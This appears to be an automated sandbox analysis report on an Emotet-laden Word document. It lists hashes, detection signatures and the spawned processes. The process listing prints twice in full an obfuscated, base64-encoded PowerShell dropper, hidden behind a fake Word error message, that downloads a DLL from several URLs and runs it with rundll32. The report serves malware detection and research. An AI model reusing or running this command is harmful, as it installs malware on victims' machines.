Play interactive tour

Edit tour

Analysis Report Doc.doc

Overview

General Information

Sample Name:	Doc.doc
Analysis ID:	337532
MD5:	16f391d60eff19aabb43225c85d5145c
SHA1:	58becf84bea5dafb9d46afc194a4eaf946fa4c72
SHA256:	af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

AV process strings found (often used to terminate AV products)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2188 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 592 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2504 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 2408 cmdline: POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2532 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 MD5: DD81D91FF3B0763C392422865C9AC12E)

